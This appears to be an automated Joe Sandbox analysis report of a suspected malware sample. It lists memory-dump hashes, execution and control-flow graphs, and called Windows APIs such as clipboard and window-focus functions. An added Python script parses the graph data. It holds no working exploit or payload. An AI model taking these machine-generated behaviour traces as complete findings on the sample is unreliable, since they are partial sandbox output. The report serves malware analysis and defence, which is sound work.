                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 671d9bf01c7a3997478886bc70b27ff2d2bb93dfaedf3b6e160ccd671164205f
                                                          • Instruction ID: faae9302c6b70bdee71761469bda04e9f5dfdc1d5b7acdf92aaa66b9b5612017
                                                          • Opcode Fuzzy Hash: 671d9bf01c7a3997478886bc70b27ff2d2bb93dfaedf3b6e160ccd671164205f
                                                          • Instruction Fuzzy Hash: EE41D131A44205DFEF52CF95EC81BAEBFB2EF88300F218526E541EB250D6319985DBE1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4ad57ed12662829c3eae7cb0788c0b6e45d1e92ec8206cda9b38cd44b1526431
                                                          • Instruction ID: 4a2f338fc28ee394905f8d01a8a9361abd28de1fb2c0962d1e82ab72eb369c7a
                                                          • Opcode Fuzzy Hash: 4ad57ed12662829c3eae7cb0788c0b6e45d1e92ec8206cda9b38cd44b1526431
                                                          • Instruction Fuzzy Hash: 0741A431A44209DFEB52CF95EC41BAEBFB6FB88300F218526E505DB250D631D9819BE1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb7252bfd0fd3ab2aa59a2860fdf5a0adfa0c581e1516004efa5d133a797a272
                                                          • Instruction ID: 46b50352610a5fefc7c8e18ff8ba7f1ec07c65b29d390679579389fb97b5052a
                                                          • Opcode Fuzzy Hash: bb7252bfd0fd3ab2aa59a2860fdf5a0adfa0c581e1516004efa5d133a797a272
                                                          • Instruction Fuzzy Hash: 95410531A48205DFEB42CFA4ED81BAEBFB2EB49300F258422E541DB350D635D9849BE1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1432211074.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6c70000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c4d8e9469dbf58d6254b976d134089ed56c4c22d927184e16444cfd256b323b0
                                                          • Instruction ID: d14d7df90c782b1dac8d129a47a999e01d9eb0ef171d7cda6512c98c305f0749
                                                          • Opcode Fuzzy Hash: c4d8e9469dbf58d6254b976d134089ed56c4c22d927184e16444cfd256b323b0
                                                          • Instruction Fuzzy Hash: 3441B6B0E012298BEBA8CF1ACD4469DBAF2BB89304F11C5EAD40DA7254DB745AC5CF45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1432211074.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6c70000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf1cb0f8894db2a87da5143fdca34fe64b836468672e278778217f0b08a73565
                                                          • Instruction ID: 1bfde61b49d6cc68f36bb6606d15fc28511eb57cc842c3fcaf114f882bdec8e1
                                                          • Opcode Fuzzy Hash: bf1cb0f8894db2a87da5143fdca34fe64b836468672e278778217f0b08a73565
                                                          • Instruction Fuzzy Hash: F7314D71D057988FEB69CF2B8C5469ABBF6EF85300F05C0EAD4489B255DB740A85CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9729bddfb7574e8455e13bbb7f9bbfcf4e16e3ae7c3e92acd4725dfe192dc560
                                                          • Instruction ID: bd8b7fd9f0b1246e1fad6c70c3dddfa91a2d4fd1d93c08b246eac11803916e7d
                                                          • Opcode Fuzzy Hash: 9729bddfb7574e8455e13bbb7f9bbfcf4e16e3ae7c3e92acd4725dfe192dc560
                                                          • Instruction Fuzzy Hash: 1A31A3B0D116188BEB69CF6BCC4879EFAF7BF89304F14C5AAD40CA6254DB740A859F10
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430379000.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6090000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 658b3422ee16ff1aba7d3131ea2e40bd913b712c0fe806574d9d2c0d6e08c6ff
                                                          • Instruction ID: 3a7eea02a236bec384b4dbb787e9aefccfa916e66abec79354de68cb4fd68c85
                                                          • Opcode Fuzzy Hash: 658b3422ee16ff1aba7d3131ea2e40bd913b712c0fe806574d9d2c0d6e08c6ff
                                                          • Instruction Fuzzy Hash: 603197B1D016588BEB69CF6BC94938EFBF7BFC9304F14C5AAC448AA255EB7405858F10

                                                          Execution Graph

                                                          Execution Coverage:3.1%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:27.1%
                                                          Total number of Nodes:59
                                                          Total number of Limit Nodes:2
                                                          execution_graph (graph-widget data reflowed, one bullet per connected component; "a -> b" is an edge between node addresses, names in brackets are the imports called in that node)
                                                          • 408620 -> 40862f; 40862f -> 408644 [GetCurrentProcessId, GetCurrentThreadId]; 408644 -> 408669 -> 40866d [SHGetSpecialFolderPathW, GetForegroundWindow] (408644 -> 40866d also directly); 40866d -> 4086c2 -> 40876f [ExitProcess]; 40862f also branches directly to 4086c2 and to 40876f
                                                          • 43a6e1 -> 43a6ea [GetForegroundWindow] -> 43a6fd
                                                          • 43cce0 -> 43cd00 -> 43cd3e -> 43cdbe; 43cd00 and 43cd3e each also call 43a5b0 [LdrInitializeThunk], continuing to 43cd3e and 43cdbe respectively
                                                          • 40c8e6 [CoInitializeEx, CoInitializeEx] (no edges)
                                                          • 438aa4 -> 438aae [RtlAllocateHeap]
                                                          • 40ca6d [CoInitializeSecurity] (no edges)
                                                          • 43b12d -> 43b140 -> 43b1bf -> 43a5b0 [LdrInitializeThunk] -> 43b30b; 43b140 also calls 43a5b0 [LdrInitializeThunk], continuing to 43b1bf
                                                          • 40a970 -> 40a9a0 (loops on itself) -> 438ad0; 438ad0 -> 438ae3 -> 438ae8 [RtlFreeHeap] -> 438af4, or 438ad0 -> 438af4 directly; 438af4 -> 40ae9c; 40a9a0 -> 40ae9c also directly
                                                          • 4330d2 -> 4330d7 -> 4330fd [GetUserDefaultUILanguage] -> 433120
                                                          • 40d4f3 -> 401f70 -> 401f7e
                                                          • 40d4f8 [CoUninitialize] -> 40e292
                                                          • 433df5 -> 433e31 -> 433e93; 433e31 also calls 43a5b0 [LdrInitializeThunk], which returns to 433e31
                                                          • 43af94 -> 43afa0 (loops on itself) -> 43a5b0 [LdrInitializeThunk] -> 43b1ec
                                                          • 43a8fb -> 43a940 -> 43aaae; 43a940 also calls 43a5b0 [LdrInitializeThunk], continuing to 43aaae
                                                          • 43ab3b -> 43ab60 -> 43abe2; 43ab60 also calls 43a5b0 [LdrInitializeThunk], continuing to 43abe2; 43abe2 calls 43a5b0 [LdrInitializeThunk] again and returns to 43abe2
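The execution_graph and control_flow_graph data on this page are the raw node/edge text behind Joe Sandbox's graph widgets. The following reader is an added example written for this page, not part of Joe Sandbox or of the report; it turns that text into nodes and edges and lists, per entry node, which imported APIs are reachable from it, which is the triage question the execution graph answers (for example, what the function at 408620 can call before ExitProcess). The token grammar it assumes is inferred from the report text itself ("<id> <addr>[-<end>] [ApiName ...]" declares a node, "<id>-><id>" an edge); the sample input is the execution_graph line and the first control_flow_graph line of this report, copied inline.

```python
import re
from collections import defaultdict

# Added example for this report: a reader for the flattened graph text that
# Joe Sandbox's "Execution Graph" / "Control-flow Graph" widgets leave behind.
# Token grammar (inferred from the report, not documented by Joe Sandbox):
#   "<id> <addr>[-<end>] [ApiName ...]"  declares a node
#   "<id>-><id>"                          declares a directed edge
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> {"addr": str, "apis": [str]}."""
    tokens = text.split()
    if tokens and tokens[0] in ("execution_graph", "control_flow_graph"):
        tokens = tokens[1:]                     # widget type tag, not a node
    nodes, edges = {}, []
    state, nid = "id", None
    for tok in tokens:
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            state = "id"                        # a new node id may follow an edge
        elif state == "id" or (state == "labels" and tok.isdigit()):
            nid = int(tok)                      # ids are decimal; addresses are hex
            nodes[nid] = {"addr": None, "apis": []}
            state = "addr"
        elif state == "addr":
            nodes[nid]["addr"] = tok            # "408620" or "43a320-43a356"
            state = "labels"
        else:
            nodes[nid]["apis"].append(tok)      # imported API called in this node
    return nodes, edges


def roots(nodes, edges):
    """Ids with no incoming edge from another node: the graph's entry points."""
    has_pred = {dst for src, dst in edges if src != dst}
    return [n for n in nodes if n not in has_pred]


def reachable_apis(nodes, edges, root):
    """Sorted, de-duplicated API names on every node reachable from root."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    seen, stack, apis = set(), [root], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        apis.update(nodes[n]["apis"])
        stack.extend(succ[n])
    return sorted(apis)


def summarize(text):
    """Map each entry node's address to the APIs reachable from it."""
    nodes, edges = parse_graph(text)
    return {nodes[r]["addr"]: reachable_apis(nodes, edges, r)
            for r in roots(nodes, edges)}


# Sample input: the execution_graph line of this report (process 2), verbatim.
EXECUTION_GRAPH = """execution_graph 13524 408620 13526 40862f 13524->13526 13525 40876f ExitProcess 13526->13525
13527 408644 GetCurrentProcessId GetCurrentThreadId 13526->13527 13530 4086c2 13526->13530
13528 408669 13527->13528 13529 40866d SHGetSpecialFolderPathW GetForegroundWindow 13527->13529
13528->13529 13529->13530 13530->13525 13531 43a6e1 13532 43a6ea GetForegroundWindow 13531->13532
13533 43a6fd 13532->13533 13534 43cce0 13535 43cd00 13534->13535 13538 43cd3e 13535->13538
13540 43a5b0 LdrInitializeThunk 13535->13540 13536 43cdbe 13538->13536 13541 43a5b0 LdrInitializeThunk
13538->13541 13540->13538 13541->13536 13542 40c8e6 CoInitializeEx CoInitializeEx 13543 438aa4
13544 438aae RtlAllocateHeap 13543->13544 13545 40ca6d CoInitializeSecurity 13546 43b12d 13547 43b140
13546->13547 13548 43b1bf 13547->13548 13553 43a5b0 LdrInitializeThunk 13547->13553
13552 43a5b0 LdrInitializeThunk 13548->13552 13551 43b30b 13552->13551 13553->13548 13554 40a970
13557 40a9a0 13554->13557 13555 40ae9c 13557->13555 13557->13557 13558 438ad0 13557->13558
13559 438ae3 13558->13559 13560 438af4 13558->13560 13561 438ae8 RtlFreeHeap 13559->13561
13560->13555 13561->13560 13510 4330d2 13511 4330d7 13510->13511 13512 4330fd GetUserDefaultUILanguage
13511->13512 13513 433120 13512->13513 13567 40d4f3 13571 401f70 13567->13571 13569 40d4f8 CoUninitialize
13570 40e292 13569->13570 13572 401f7e 13571->13572 13573 433df5 13576 433e31 13573->13576
13574 433e93 13576->13574 13577 43a5b0 LdrInitializeThunk 13576->13577 13577->13576 13519 43af94
13520 43afa0 13519->13520 13520->13520 13523 43a5b0 LdrInitializeThunk 13520->13523 13522 43b1ec
13523->13522 13578 43a8fb 13580 43a940 13578->13580 13579 43aaae 13580->13579
13582 43a5b0 LdrInitializeThunk 13580->13582 13582->13579 13583 43ab3b 13584 43ab60 13583->13584
13585 43abe2 13584->13585 13589 43a5b0 LdrInitializeThunk 13584->13589 13588 43a5b0 LdrInitializeThunk
13585->13588 13588->13585 13589->13585"""

# Sample input: the control_flow_graph line for the function at 43a320, verbatim.
CONTROL_FLOW_GRAPH = """control_flow_graph 115 43a320-43a356 116 43a360-43a3ac 115->116 116->116
117 43a3ae-43a3bb 116->117 119 43a3c1-43a3c6 117->119 120 43a446-43a47f 117->120 119->120
121 43a480-43a4cc 120->121 121->121 122 43a4ce-43a4d5 121->122 123 43a4d9-43a4db 122->123
124 43a4e1-43a4e6 123->124 125 43a430-43a443 123->125 124->125 125->120"""

if __name__ == "__main__":
    for addr, apis in summarize(EXECUTION_GRAPH).items():
        print(addr, ", ".join(apis) or "(no API calls reachable)")
    cfg_nodes, cfg_edges = parse_graph(CONTROL_FLOW_GRAPH)
    print("blocks:", len(cfg_nodes), "edges:", len(cfg_edges))
```

The node count the parser recovers (59) matches the "Total number of Nodes" the report states for this graph, which is a cheap sanity check when pointing the reader at another report. Entry nodes are taken as nodes with no incoming edge from a different node, so a self-looping block such as 43afa0 does not hide the real entry above it; API names are sorted rather than listed in graph order because the widget's edge order is not the execution order.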

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32 ref: 00408644
                                                          • GetCurrentThreadId.KERNEL32 ref: 0040864D
                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040869F
                                                          • GetForegroundWindow.USER32 ref: 004086B4
                                                          • ExitProcess.KERNEL32 ref: 00408771
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                          • String ID:
                                                          • API String ID: 4063528623-0
                                                          • Opcode ID: f269ce15b62759249a87e8095c09880a933a93e1a5a8af1a285a3f39b88257a8
                                                          • Instruction ID: 2ab26929ac22d33901149aa551f8fc81b7b3b861aac10a10b3a4e62ada129a5c
                                                          • Opcode Fuzzy Hash: f269ce15b62759249a87e8095c09880a933a93e1a5a8af1a285a3f39b88257a8
                                                          • Instruction Fuzzy Hash: 30314473A0031D0BCB247EB55D8A36AF1869BC4310F1F103D6A89EB3D2EE6E0C058299

                                                          Control-flow Graph

                                                          control_flow_graph (basic blocks as address ranges; "->" is a control-flow edge)
                                                          • 43a320-43a356 -> 43a360-43a3ac (loops on itself) -> 43a3ae-43a3bb; 43a3ae-43a3bb -> 43a446-43a47f directly or via 43a3c1-43a3c6
                                                          • 43a446-43a47f -> 43a480-43a4cc (loops on itself) -> 43a4ce-43a4d5 -> 43a4d9-43a4db; 43a4d9-43a4db -> 43a430-43a443 directly or via 43a4e1-43a4e6; 43a430-43a443 -> back to 43a446-43a47f
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $A.C$(EFG$L9;$M5F7
                                                          • API String ID: 0-716650282
                                                          • Opcode ID: a3248d0ae3c2ff1dc0494626869ba73b6ec220572a9d65c3157c373830ba5bef
                                                          • Instruction ID: 9b362c61da336a2ae8ea6290e8c0db5c8ff5c04be66d4453546d1038febf736e
                                                          • Opcode Fuzzy Hash: a3248d0ae3c2ff1dc0494626869ba73b6ec220572a9d65c3157c373830ba5bef
                                                          • Instruction Fuzzy Hash: D3312632651B009FC724CF75DC46356BAE2BB86754F25CA3DD0A6C7795E7B8D0058B08

                                                          Control-flow Graph

                                                          control_flow_graph (basic blocks as address ranges; "->" is a control-flow edge)
                                                          • 40bd61-40bdbf -> 40bdc0-40be1b (loops on itself) -> 40be1d-40be26
                                                          • 40be1d-40be26 -> 40be41-40be50 directly, or -> 40be28-40be2f -> 40be30-40be3f (loops on itself) -> 40be41-40be50
                                                          • 40be41-40be50 -> 40be75-40be95 directly, or -> 40be52-40be54 -> 40be60-40be71 (loops on itself) -> 40be73 -> 40be75-40be95
                                                          • 40be75-40be95 -> 40bea0-40bee5 (loops on itself) -> 40bee7-40bf14 -> 40bf1b-40bf37
Similarity
• API ID:
• String ID: ?L"$iL"
• API String ID: 0-3699518731
• Opcode ID: f70d4f0d1b59178c64416d6cc34cefdb3cfcb84c192bbc1135f2e6c00128c05a

Control-flow Graph
• Function at 43a5b0, calls LdrInitializeThunk
APIs
• LdrInitializeThunk.NTDLL(0043C8CB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A5DE
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Similarity
• API ID: InitializeThunk
• String ID: 0?>=
• API String ID: 2994545307-3891647100
• Opcode ID: 4ac6dad85a8b8badd7a4f14bbafc2d79f95844eb08445b7414a751a7e0bb29ca

Control-flow Graph
• Function at 43a6b4, calls GetForegroundWindow and 43c6f0
APIs
• GetForegroundWindow.USER32 ref: 0043A6EF
Similarity
• API ID: ForegroundWindow
• String ID: 5()*
• API String ID: 2020703349-1326618346
• Opcode ID: ef895584e3463f3f68fd34886f599cb15f52c97dd58883bf3794c0fc238b69aa

Control-flow Graph
• Function at 40c8e6, calls CoInitializeEx twice
APIs
• CoInitializeEx.OLE32(00000000,00000002), ref: 0040C8EA
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CA31
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 6f6effb1460477831ac12bc4fe1b86987d569b8e94679f6ac3f5153db78c57cc

Control-flow Graph
• Function at 4330d2, calls 4142d0, 43c130 and GetUserDefaultUILanguage
APIs
• GetUserDefaultUILanguage.KERNELBASE ref: 004330FD
Similarity
• API ID: DefaultLanguageUser
• String ID:
• API String ID: 95929093-0
• Opcode ID: fecec9b8bdc620ed66c5f7f7fbbde8d10dba92c50af755c723726afc618a3463

Control-flow Graph
• Function at 43a6e1, calls GetForegroundWindow and 43c6f0
APIs
• GetForegroundWindow.USER32 ref: 0043A6EF
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: 5ee508286f2350a72e81952e3a6e277e2defe54f026306661ed469a043f484d7

Control-flow Graph
• Function at 40ca6d, calls CoInitializeSecurity
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CA7F
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
• Opcode ID: 73c3ff371ddf2dba0e2c51fe4018f5a35349ad899bfef2bbca8f86c89653fe45

Control-flow Graph
• Function at 438ad0, calls 43bca0 and RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(?,00000000,?,0043A596,?,0040B500,00000000,0040B55F), ref: 00438AEE
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 1a6db2d9ad1dda0081a400328015eb6b4d5948ceae9bed2b2506b368cf6b16e2
APIs
• RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 00438AB4
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 33cbe60f46516dd729390eb0eccd9d123dfa1e23fdcf3b14e3fb3e7dd79eea06
Similarity
• API ID: Uninitialize
• String ID:
• API String ID: 3861434553-0
• Opcode ID: 90a3a7e7db08da2634a4ed5c88deb32946b38afa0e0eeedc36dbb0d2118d5f56
Similarity
• API ID:
• String ID: &t6v$&:$&:$,p&r$0'$1h/j$:<$;l9n$<[5]$=S2U$=_%A$>E$?W4Y$A/6Q$B7P9$EG$JG$N+P-$Z?E!$^_$mlkj$wp$wp$xM`O$8:
• API String ID: 0-4036459184
• Opcode ID: b86619ce0fb86be72c075babf46424e4b6a5dc08b7dfa0c816d11e3d25bdbeba
APIs
• CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C,00000000), ref: 00435F83
• SysAllocString.OLEAUT32(0000D43F), ref: 00435FF8
• CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00436036
• SysAllocString.OLEAUT32(0000D43F), ref: 00436095
• SysAllocString.OLEAUT32(0000D43F), ref: 00436127
• VariantInit.OLEAUT32(?), ref: 00436196
• SysFreeString.OLEAUT32(?), ref: 0043643F
• SysFreeString.OLEAUT32(?), ref: 00436448
• SysFreeString.OLEAUT32(00000000), ref: 0043645C
Similarity
• API ID: String$AllocFree$BlanketCreateInitInstanceProxyVariant
• String ID: "b7d$%)*+$,rSt$/~ p$1n*`$:j.l$Ef]x$Yz=|
• API String ID: 2737081056-2387816766
• Opcode ID: b7b6029c48d98f914741704bef50a66fad523e17e46cc5b463d75fe370098866
Similarity
• API ID:
• String ID: &t6v$&:$&:$,p&r$0'$1h/j$:<$;l9n$<[5]$=_%A$>E$A/6Q$EG$JG$mlkj$wp$wp$xM`O$8:
• API String ID: 0-611813272
• Opcode ID: 4bf8c3e06e125019cc28075f44cd85383120c8b00b071029927c52c99f19c43b
Similarity
• API ID:
• String ID: &t6v$&:$&:$,p&r$0'$1h/j$:<$;l9n$<[5]$=_%A$>E$A/6Q$EG$JG$mlkj$wp$wp$xM`O$8:
• API String ID: 0-611813272
• Opcode ID: ff2a99c19f9b840e95b2d17971a0ad3f292e750e1885d5819587218073c6286e
APIs
  • Part of subcall function 0043A5B0: LdrInitializeThunk.NTDLL(0043C8CB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A5DE
• FreeLibrary.KERNEL32(?), ref: 00419CAA
• FreeLibrary.KERNEL32(?), ref: 00419D2B
Similarity
• API ID: FreeLibrary$InitializeThunk
• String ID: J/h$mlkj$mlkj$mlkj$Wu
• API String ID: 764372645-1318733947
• Opcode ID: 64b866459d3efd96d91c01d890908a9db4bf1cc0fc2684fdae2d024f71781d6d
Similarity
• API ID: Clipboard$CloseDataOpen
• String ID:
• API String ID: 2058664381-0
• Opcode ID: ed22625543cd6cbe4c61938bd6270a151eadf7f901f5a69968a458354b63d413
Similarity
• API ID:
• String ID: pr$pr$|C$stu
• API String ID: 0-3781844917
• Opcode ID: 41d49a1763fe52469dcbf448ad62cd4b7ca4673945f29148586fff256c62a002
Similarity
• API ID:
• String ID: BfD$(&B$,N;@$B>\0$EF$P2O4$t6GH
• API String ID: 0-3638485462
• Opcode ID: 3bfa644d511106c29585e5997b5b16d3f54ad53c9b6297e5ebb30188e6e4366f
                                                          • Instruction ID: d3488ee24b6fb1c2b90eccc6e9cd5233fee36bd8583c441fe1e3a9afb2e27a03
                                                          • Opcode Fuzzy Hash: 3bfa644d511106c29585e5997b5b16d3f54ad53c9b6297e5ebb30188e6e4366f
                                                          • Instruction Fuzzy Hash: 77512971D002209FDB15CF68C89166BBB72EB82310F66816CE815BF795DB758C02CBD9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: m$mlkj$mlkj$mlkj$mlkj$mlkj
                                                          • API String ID: 2994545307-3608166878
                                                          • Opcode ID: bf0c6fe6ac3fd079f3363a373944b5e6a258b3e08f63ba39d0d4d6a9a5e4bb28
                                                          • Instruction ID: 3d83204929475d2243f35793712f265c1150c7b3cc80a7e3b3cdd320ce48e554
                                                          • Opcode Fuzzy Hash: bf0c6fe6ac3fd079f3363a373944b5e6a258b3e08f63ba39d0d4d6a9a5e4bb28
                                                          • Instruction Fuzzy Hash: 0432293960C2409FD715CF24C8506BFB7E2FF9A304F28492EE5C697252DB389942CB99
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: BhC$mlkj$"#d$fC
                                                          • API String ID: 0-1588649497
                                                          • Opcode ID: 0a951961818f4deef2a5dc80d74dd1fd7fba13dcb5c6d0f204d6eeafbeb5e776
                                                          • Instruction ID: 01b69275c66d40f68532354ebb2a4c5dcc00f28d52a01c540a03275d902fae9a
                                                          • Opcode Fuzzy Hash: 0a951961818f4deef2a5dc80d74dd1fd7fba13dcb5c6d0f204d6eeafbeb5e776
                                                          • Instruction Fuzzy Hash: 1D515575208301ABE7149F29DC92B6FB7E1EB8A308F04983DF58087382D7799C15D766
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *+$Z9:;$]5R7
                                                          • API String ID: 0-1782461210
                                                          • Opcode ID: 18317f73d4b20812587b15f1d8e783b2e86799ef8bff05252d0e068513a8142b
                                                          • Instruction ID: f3e337a824cacc6ba73b64c2a0d4bdd9619d61f0da174fd01dd171e9017f99f7
                                                          • Opcode Fuzzy Hash: 18317f73d4b20812587b15f1d8e783b2e86799ef8bff05252d0e068513a8142b
                                                          • Instruction Fuzzy Hash: CDD105715083018BD728CF25C8926ABB7F2FFD2350F19992DE4C58B394E7789849CB86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: =?$$
                                                          • API String ID: 0-4187781974
                                                          • Opcode ID: 912699e5b5a83eda740f84456a48b7eea04782f4ff5260ae1e234fab1a7b3f9b
                                                          • Instruction ID: 02130b947a74d38fc6f31402f909bc89a173168320cded222b6466677b06a2ff
                                                          • Opcode Fuzzy Hash: 912699e5b5a83eda740f84456a48b7eea04782f4ff5260ae1e234fab1a7b3f9b
                                                          • Instruction Fuzzy Hash: 17913431A083008BD718DE28E89157FB7E2EFDA310F15993EE59687391D739E806CB56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: [^$mlkj$r
                                                          • API String ID: 0-1669103348
                                                          • Opcode ID: 21e9d6ce220200bc9f185d709e92f6d5e6c3a4ce1628005c404ebdc8a80ffc3a
                                                          • Instruction ID: ef4a1bd29f2b91fadf10b969bcbb7c19a58179f01bb9ca66c101a2bf60e5b683
                                                          • Opcode Fuzzy Hash: 21e9d6ce220200bc9f185d709e92f6d5e6c3a4ce1628005c404ebdc8a80ffc3a
                                                          • Instruction Fuzzy Hash: C2B1027560D380DFD3049F28D89162EBBE2AF9A315F68896DF1C5873A1DB399940CB06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PA$bQA$mlkj
                                                          • API String ID: 0-4187677057
                                                          • Opcode ID: 61665537f678a7279439f67486d301fc68e7e742a4c3ab9a55f07ac3181458a1
                                                          • Instruction ID: 75354251b3903ef5e4615d9cd6dee5b584e0579d9b4b5e89aefee9135f14cca8
                                                          • Opcode Fuzzy Hash: 61665537f678a7279439f67486d301fc68e7e742a4c3ab9a55f07ac3181458a1
                                                          • Instruction Fuzzy Hash: 2A91E074908340DBD7209F14D891BABB7B4FFD6354F144A2DE4C98B391EB789981CB8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: t$c$|x
                                                          • API String ID: 0-1736779163
                                                          • Opcode ID: b29248f8861ec8d9f9602d0609553e13db4ca6b245818f8b3d2a13e52ec70524
